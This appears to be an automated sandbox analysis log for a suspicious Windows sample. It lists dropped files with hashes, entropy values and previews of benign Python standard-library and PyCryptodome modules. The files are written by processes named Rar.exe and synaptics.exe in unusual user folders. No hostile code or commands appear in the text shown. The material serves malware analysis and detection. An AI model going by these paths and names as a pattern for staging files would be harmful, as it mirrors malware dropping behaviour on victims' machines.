                                                                                                                                                                                      SSDEEP:192:dTlKqIJUzY8EJm8QQo7YA3bVMR0Qid+dWMcK3CM1pBY45wBrhc6YN4o4F1Yzp8cW:dxK8DEDEBBhQErzhF8eTpJ
                                                                                                                                                                                      MD5:01BBBA21BD0235FB164A2ED722AD6D04
                                                                                                                                                                                      SHA1:CBCF9E771D22817D8AED482166D70D16E8711D36
                                                                                                                                                                                      SHA-256:28DA125E058CD0E535467B214B510EE4B1E666BE57EDB183404C09EDF935EBBC
                                                                                                                                                                                      SHA-512:1626C618D742458D1C66626758A0BC28F1C829C60EC8F14B02BFD7E82803FF771103C0D5C22C063229920478F5BAAF694B8DBA32115DD5C41AF290153F634F2D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Selectors module.....This module allows high-level and efficient I/O multiplexing, built upon the..`select` module primitives..."""......from abc import ABCMeta, abstractmethod..from collections import namedtuple..from collections.abc import Mapping..import math..import select..import sys......# generic events, that must be mapped to implementation-specific ones..EVENT_READ = (1 << 0)..EVENT_WRITE = (1 << 1)......def _fileobj_to_fd(fileobj):.. """Return a file descriptor from a file object..... Parameters:.. fileobj -- file object or file descriptor.... Returns:.. corresponding file descriptor.... Raises:.. ValueError if the object is invalid.. """.. if isinstance(fileobj, int):.. fd = fileobj.. else:.. try:.. fd = int(fileobj.fileno()).. except (AttributeError, TypeError, ValueError):.. raise ValueError("Invalid file object: ".. "{!r}".format(fileobj)) from None.. if fd < 0:..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8803
                                                                                                                                                                                      Entropy (8bit):4.563820102763972
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:0x+ykEgEzeDlpO/ki7QqpiG9GikHQ/aBKC8rFo:07kEgEzeDlpO/kiJpa9BYO
                                                                                                                                                                                      MD5:D72FAB00C3F5E7AED0B707D03A30CB02
                                                                                                                                                                                      SHA1:54751E0C54FB64364A9989D9D7B519C3D1E293EF
                                                                                                                                                                                      SHA-256:0C8AC8DCB31AB0E9B5EBFD1CC99A827BC78DEFF9966BCC7F7B6A3AB08388A9AE
                                                                                                                                                                                      SHA-512:D127A2E2F6740A2845EBF455D3501B85D60F4E452D2D48029D47584149646C2A2ED189D6B9A4D6AD544EE9102ED9D3FF2579DFE348FFC641CA7CE2D292A381C2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Manage shelves of pickled objects.....A "shelf" is a persistent, dictionary-like object. The difference..with dbm databases is that the values (not the keys!) in a shelf can..be essentially arbitrary Python objects -- anything that the "pickle"..module can handle. This includes most class instances, recursive data..types, and objects containing lots of shared sub-objects. The keys..are ordinary strings.....To summarize the interface (key is a string, data is an arbitrary..object):.... import shelve.. d = shelve.open(filename) # open, with (g)dbm filename -- no suffix.... d[key] = data # store data at key (overwrites old data if.. # using an existing key).. data = d[key] # retrieve a COPY of the data at key (raise.. # KeyError if no such key) -- NOTE that this.. # access returns a *copy* of the entry!.. del d[key] # delete data stored at key (raises KeyError..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13851
                                                                                                                                                                                      Entropy (8bit):4.098342133535539
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:TiBJXH8qfr4rCOaCDCCaZUCELCrC46CBJ/WKCvCCxrJMBCSYCieC1eCEyCS412/u:TiBJXH8qf/qd67WaaZaUT66T6T1gzji
                                                                                                                                                                                      MD5:618BD4282F39939BF6F935F67D4107C7
                                                                                                                                                                                      SHA1:42E6CD923D7EE305A0D70F6BA861DE587EC2F444
                                                                                                                                                                                      SHA-256:731C1374ED3D47C53C0C38E4898F2A21DF0B7984E730C7FF3F3B26B96B25FAC6
                                                                                                                                                                                      SHA-512:7710378DA30D5CEE798FE09FA60B2B8A7C1F4E0B288E0F37319C7AC574451CBE6B983E82A2A813CD64BBD8C04807686080AC8C7FD105E584E35AF51FFED1B5B1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""A lexical analyzer class for simple shell-like syntaxes."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998..# Input stacking and error message cleanup added by ESR, March 2000..# push_source() and pop_source() made explicit by ESR, January 2001...# Posix compliance, split(), string arguments, and..# iterator interface by Gustavo Niemeyer, April 2003...# changes to tokenize more like Posix shells by Vinay Sajip, July 2016.....import os..import re..import sys..from collections import deque....from io import StringIO....__all__ = ["shlex", "split", "quote", "join"]....class shlex:.. "A lexical analyzer class for simple shell-like syntaxes.".. def __init__(self, instream=None, infile=None, posix=False,.. punctuation_chars=False):.. if isinstance(instream, str):.. instream = StringIO(instream).. if instream is not None:.. self.instream = instream.. self.infile = infile.. else:.. self.ins
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):55816
                                                                                                                                                                                      Entropy (8bit):4.55270615672447
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:pQmQwxUSSvo4zYHze7D2tYy0QZGqr8TyvBZ9hmmDcrEi:pQmpnSvo4ETe7YuuDcrEi
                                                                                                                                                                                      MD5:964EE17F609BDE1FDDC4EBE87DB9DC63
                                                                                                                                                                                      SHA1:7073C339362B7DD618C02A6DBAD5B465A5CF3DC1
                                                                                                                                                                                      SHA-256:09B0142B9E9BF996170D05834FCA7B466AC7B64F7F6DFCEB17CB581CD0E53F08
                                                                                                                                                                                      SHA-512:0642B3DA6A7DC8E14EA0FD73AF72E23AB141A4554BB7267D69A456A19F45F7E0FFB70A6537C6720FFA970E2F07DD372D60BC595ECFCDB4C80A038C0EF2C55698
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Utility functions for copying and archiving files and directory trees.....XXX The functions here don't copy the resource fork or other metadata on Mac....."""....import os..import sys..import stat..import fnmatch..import collections..import errno....try:.. import zlib.. del zlib.. _ZLIB_SUPPORTED = True..except ImportError:.. _ZLIB_SUPPORTED = False....try:.. import bz2.. del bz2.. _BZ2_SUPPORTED = True..except ImportError:.. _BZ2_SUPPORTED = False....try:.. import lzma.. del lzma.. _LZMA_SUPPORTED = True..except ImportError:.. _LZMA_SUPPORTED = False...._WINDOWS = os.name == 'nt'..posix = nt = None..if os.name == 'posix':.. import posix..elif _WINDOWS:.. import nt....COPY_BUFSIZE = 1024 * 1024 if _WINDOWS else 64 * 1024.._USE_CP_SENDFILE = hasattr(os, "sendfile") and sys.platform.startswith("linux").._HAS_FCOPYFILE = posix and hasattr(posix, "_fcopyfile") # macOS....# CMD defaults in Windows 10.._WIN_DEFAULT_PATHEXT = ".COM;.EXE;.BAT;.CMD;
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2530
                                                                                                                                                                                      Entropy (8bit):4.711624840854989
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:SipTfd9QLvDh4vDgitan3vchcLysiasNuk0A942ZQR2qXZORotZuGqzCs:SiRfd9QLvt4vsit+0uustsJQRARoOj
                                                                                                                                                                                      MD5:0DCA73844D3B73C9802F6210C70DD4DE
                                                                                                                                                                                      SHA1:EABEABA84B410A8E97CA2D42B2AE48CA2B78D8EC
                                                                                                                                                                                      SHA-256:D470D65C87914AE671A202B8987437A6918AAE477942E58BDB1D0056528115F7
                                                                                                                                                                                      SHA-512:440149ABE836FFD5E4716F2474A6D0C6A0460F543A39BEC68E15651B5BC3E3294F7FC0D85C41C449224F234219809F710743E0002501D734A721B68377D39036
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import _signal..from _signal import *..from enum import IntEnum as _IntEnum...._globals = globals()...._IntEnum._convert_(.. 'Signals', __name__,.. lambda name:.. name.isupper().. and (name.startswith('SIG') and not name.startswith('SIG_')).. or name.startswith('CTRL_'))...._IntEnum._convert_(.. 'Handlers', __name__,.. lambda name: name in ('SIG_DFL', 'SIG_IGN'))....if 'pthread_sigmask' in _globals:.. _IntEnum._convert_(.. 'Sigmasks', __name__,.. lambda name: name in ('SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'))......def _int_to_enum(value, enum_klass):.. """Convert a numeric value to an IntEnum member... If it's not a known member, return the numeric value itself... """.. try:.. return enum_klass(value).. except ValueError:.. return value......def _enum_to_int(value):.. """Convert an IntEnum member to a numeric value... If it's not an IntEnum member return the value
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7044
                                                                                                                                                                                      Entropy (8bit):5.346600306097393
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:FeGQHbITHl5m6xVZaGV/EXOZiHu/Eoft7TAUZmniQjzVHd2qE5:Fe7Hbk5nn9EXnHhItPdZ9QjI5
                                                                                                                                                                                      MD5:06626FDA113B68FEFE048B76BDA1F535
                                                                                                                                                                                      SHA1:1CD40ADA8AFF8D12C2638C13390F4D569C7B5C38
                                                                                                                                                                                      SHA-256:455C69E575B72EBF7EBC0BDEFEAA9A9369D3452AB607528FFDFAF90CA81A1454
                                                                                                                                                                                      SHA-512:924245956EB4188DEA61F2B67E80A725C73A7ECCA2AFB6A8455F13A40EC0CDFA3DAAA4D9A5D3119396C824CA73CAD620F94EA6D55C1725238C4419F331440223
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.#.......................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e...Z.z.d.Z.e.....rQe.d.e...d.d.....Z.W.n...e.y[......Y.n.w.d.d...Z.d.d...Z.d.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_stop_operation(void *state);.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4972
                                                                                                                                                                                      Entropy (8bit):5.174205755425086
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:NFDtaCGJ/VGx/uxVLM4x6stLAv74PJlQKGW:vwZApunM4ftcsPzJ
                                                                                                                                                                                      MD5:1F5DB3D208C72505864C44F407166AB8
                                                                                                                                                                                      SHA1:5479FF6F4E583A94EC51FD0A43BB946B0011793D
                                                                                                                                                                                      SHA-256:90E2DD7A7ECBAC158926CAC11CB92F0E5DA914CDE0E4C77AE16DC09DB6D1088E
                                                                                                                                                                                      SHA-512:9464C879DCFF43BA438A631E2C4B88A77D9E6B3D64FC43DD7FC39D6AE398615B0E14F14D31112AD357160390BF97A547C9FC2158AF510083CFA9A5C2C0385706
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Single DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptrz.Crypto.Cipher._raw_desa..... int DES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int DES_encrypt(const vo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6185
                                                                                                                                                                                      Entropy (8bit):5.2644804204967315
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:W3Pz+cF8LjRVdNkIOMwKYRc/2QlAeiPTiC6TtLAvE4YMxbulb5ac:o+pB8Ms1aqPTi/tcfYSbwAc
                                                                                                                                                                                      MD5:40189A149B66C94209DE6D4A564F60F5
                                                                                                                                                                                      SHA1:038BA7592E21F34F267E0279C2F2BA9CE3571C22
                                                                                                                                                                                      SHA-256:E4E80E6ACF38F38582A7310FDA79825089A8289EC29D3B2CD10FC825930416E9
                                                                                                                                                                                      SHA-512:328621576DF16F791D1F3EBC91238F53BA87841D9E5B61842FBB6FEA4270595F6BF057681B4ED1DEDED02862E0DFF10B51F8195D9486B73F9CCD200C63F6E23C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.........................@...s....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.).a.....Module's constants for the modes of operation supported with Triple DES:..:var MODE_ECB: :ref:`Electronic Code Book (ECB) <ecb_mode>`.:var MODE_CBC: :ref:`Cipher-Block Chaining (CBC) <cbc_mode>`.:var MODE_CFB: :ref:`Cipher FeedBack (CFB) <cfb_mode>`.:var MODE_OFB: :ref:`Output FeedBack (OFB) <ofb_mode>`.:var MODE_CTR: :ref:`CounTer Mode (CTR) <ctr_mode>`.:var MODE_OPENPGP: :ref:`OpenPGP Mode <openpgp_mode>`.:var MODE_EAX: :ref:`EAX Mode <eax_mode>`......N)..._create_cipher)...byte_string..bchr..bord..bstr)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_tz.Crypto.Cipher._raw_des3a..... int DES3_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6949
                                                                                                                                                                                      Entropy (8bit):5.306199679374291
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:v5y77I5xO5Xqk0muV9jUAWWiD+wtDMgMzfEB1RZYVrdKlHbgKqkfzBA/CF:E7FFFpEMtQg/1g1dmrFf6qF
                                                                                                                                                                                      MD5:0C117E775FC565F9DB56CD65E6222162
                                                                                                                                                                                      SHA1:7F5FC1C5B1E13B352C87391E847C4FDCF3154141
                                                                                                                                                                                      SHA-256:94F53BEF1B0A5B0E0DF9EFCB915D853D6C6F47DCEB63982EFC9EA6D2359BC53E
                                                                                                                                                                                      SHA-512:1A6921871172D78E1EE6F94711CCDFB89366B1538CF45F44FF3ACA4F889DF78FE0F5A216BED3AFCCA88136E2D94BE6358A8D4EA8037948B49C72A5ECE642254C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fO".......................@...s|...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.d.d.d...Z.d.S.)......)...MGF1N)..._copy_bytes)...ceil_div..bytes_to_long..long_to_bytes)...strxor)...Random.....)...oaep_decodec....................@...s8...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...PKCS1OAEP_CipherzXCipher object for PKCS#1 v1.5 OAEP.. Do not create directly: use :func:`new` instead.c........................sN...|..._.|.r.|..._.n.t.j.j..._.|.r.|..._.n...f.d.d....._.t.d.d.|....._.|..._.d.S.).a....Initialize this PKCS#1 OAEP cipher object... :Parameters:. key : an RSA key object. If a private half is given, both encryption and decryption are possible.. If a public half is given, only encryption is possible.. hashAlgo : hash object. The hash function to use. This can be a module under `Crypto.Hash`. or an existing h
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                                      Entropy (8bit):5.4055277344199935
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:jzLMJbLqGllz8RRyglHGLtLaLaLLLLv+rLALiLLxLJLOfi:jzCbLqylz8RsghIfuai
                                                                                                                                                                                      MD5:A1C26FDC190243471647F85E4AF29737
                                                                                                                                                                                      SHA1:262E9D357D2D86622940A4CE23823ADAE6C78E54
                                                                                                                                                                                      SHA-256:A85E40EC4D65B7487BD20D4BBC8D8687E8A1F49B065B891929BF18C932ADE7E6
                                                                                                                                                                                      SHA-512:FE38F499CED762E2A99573F7F91AA54ED15B30901141066A30D933E4711F90EF17BA05F113A2992E4090BD6E6DCF1AE6E4B174E5EFEEF0CF2501C639C555682A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fk........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.e.e.e.e.e.e.d...Z.e.e.e.e.d...Z.d.d...Z.d.S.)......N)..._create_ecb_cipher)..._create_cbc_cipher)..._create_cfb_cipher)..._create_ofb_cipher)..._create_ctr_cipher)..._create_openpgp_cipher)..._create_ccm_cipher)..._create_eax_cipher)..._create_siv_cipher)..._create_gcm_cipher)..._create_ocb_cipher)....................................).....................c....................O...s....|.|.d.<.t.t...}.|...d.d...r.|...t.....|.|.v.r.t.d.....|.r^|.d.v.r2t.|...d.k.r+t.d.....|.d...|.d.<.n,|.d.v.rGt.|...d.k.r@t.d.....|.d...|.d.<.n.|.d.k.rVt.|...d.k.rUt.d.....n.|.d.k.r^t.d.....|.|...|.f.i.|.....S.).N..keyZ.add_aes_modesFz.Mode not supported).r....r....r....r....r....r....z Too many arguments for this moder......nonce).r....r....r....r....Z.IVr....z%IV is not meaningful for the ECB mode)...dict.._modes..pop..up
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7468
                                                                                                                                                                                      Entropy (8bit):5.1475211106994925
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:VY6kvwbQ9XIHJEgsA4nx3ZzhSLR5esIDGnt834mGvWcsQNqC/Y8HvGBt83425phX:FbJHrt4x3Zu8smGtU4w1MGnU44Kt0qOp
                                                                                                                                                                                      MD5:F4163993E2D562EE1B316DE91636A055
                                                                                                                                                                                      SHA1:8116CFDBFE9BBDF873D0725C920845900FD14D2B
                                                                                                                                                                                      SHA-256:10D7E26829732707757FE6054BFE61613E37B511D9108BDF1601E175BE4FA12B
                                                                                                                                                                                      SHA-512:9E3668810F9EC6BBC9F6BFEFA36AFDA516A4895894F2B3ED63143B3E58FBA6628BCA552858C6E1FE93845D5C7DC225410AD174D5B132B9A8A8F7683EC55E171A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z'.Ciphertext Block Chaining (CBC) mode....CbcMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cbca..... int CBC_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int CBC_encrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CBC_decrypt(void *cbcState,. const uint8_t *in,. uint8_t *out,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17943
                                                                                                                                                                                      Entropy (8bit):5.290121028324049
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:gLq/qgUMlQiMS1I48juzC8Y2tMlx7vXyqE:gLSQM6jQMb7/yV
                                                                                                                                                                                      MD5:9972D408002D5CC458330B0D1DB08E0A
                                                                                                                                                                                      SHA1:5DD47EBD486F060247250E49ACD891A6828B5656
                                                                                                                                                                                      SHA-256:B294EF910B72E281F70FE60676A2AEC6172DFE8DF79E9A4AB860A6A98C0E92BE
                                                                                                                                                                                      SHA-512:B31A85BEDEA1AB04B190CF069678202674EC672712507EEBD8096AA9829E559972E455CED96D665D3FD8C224AF999A1A102E146027327CA6DE3323DDC81274C0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.a.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.e.d.d.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc....................K...s....t.d.d.|...S.).N..Enum..)...type).Z.enumsr....r.....IC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Cipher\_mode_ccm.py..enum3...s......r..............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc....................@...s....e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d.d...Z.d!d.d...Z.d!d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d!d.d...Z.d!d.d...Z.d.S.)"r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the mes
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7790
                                                                                                                                                                                      Entropy (8bit):5.11088623490323
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uo6kvf/G8HDxEpuPnxEZYhPPsCIgGGt834mGPMsQNPx/g8H+G0t834U5pptYCcXn:d3xEuxEZnCJGkU4ma5GaU4mx4DbKq+E
                                                                                                                                                                                      MD5:01B4280963587A1A5043B3C798C40F51
                                                                                                                                                                                      SHA1:3E7F6AC381BF0CA9508A4374B1ABAB9AF4523FED
                                                                                                                                                                                      SHA-256:3445010A08E709B2C1267C8A21B5B7067884011DC62D16782C872CA738845717
                                                                                                                                                                                      SHA-512:452035908A9E65AC80EDE2DFE073C293B9E42090C1E265C12ECC79926FA99F93EA8C75D032DC5158D6F58D23B895858595DDFDFEFC96070B3160B679213EECA7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.+.......................@...sp...d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(void *cfbState,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10988
                                                                                                                                                                                      Entropy (8bit):5.105679246344849
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:m7GD6nkH7cxiM16TPyl8ssmGrPU4uOGrNU4XrwSkcji+Gb:mamnGSQ480MTuOyTXMSkmi+0
                                                                                                                                                                                      MD5:DA8EB714469ECE7F3621F3D57F009084
                                                                                                                                                                                      SHA1:7EBDFEE41E407C10D7B9D62001CBBEB38EC4F2C4
                                                                                                                                                                                      SHA-256:88D163F0ADF8A879757C4D3EED96B86BB7C4130394BA641005642E2D7131876D
                                                                                                                                                                                      SHA-512:8A94C12ED6B737C83F7A9C82FDC4E1E47ADE5B80589591EF970858E574F719EB36548FCA553283FEDCAF7DB70900036201529916ABAC6BAC0210B63A12124B07
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........fM?.......................@...s....d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctrState,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12274
                                                                                                                                                                                      Entropy (8bit):5.163707800228712
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:BsVawXqNRGq1vCM4PBrU4/4DwU4X3Rz/AfrRWDL/773uewFjp3xWmk1:GawXq/F4M4lTwwTXp/AVeLT732L071
                                                                                                                                                                                      MD5:0D25E542E979894286196F8A798A823A
                                                                                                                                                                                      SHA1:22F237094A8D2CDE34164A5CEAEC3539EC429A75
                                                                                                                                                                                      SHA-256:9BBDBDAAFEAD22489531D0992A69FFB8A05BCD2AD930256123458691B5EBFF5C
                                                                                                                                                                                      SHA-512:7E67A31A475F459617B604B468E351A3947468B1BD83BD33945C7A21FC5DC1B0D3294A0D1655F3B3614E6427C53BD032DC5DF8457CE8DA2DD4378D5550D01100
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
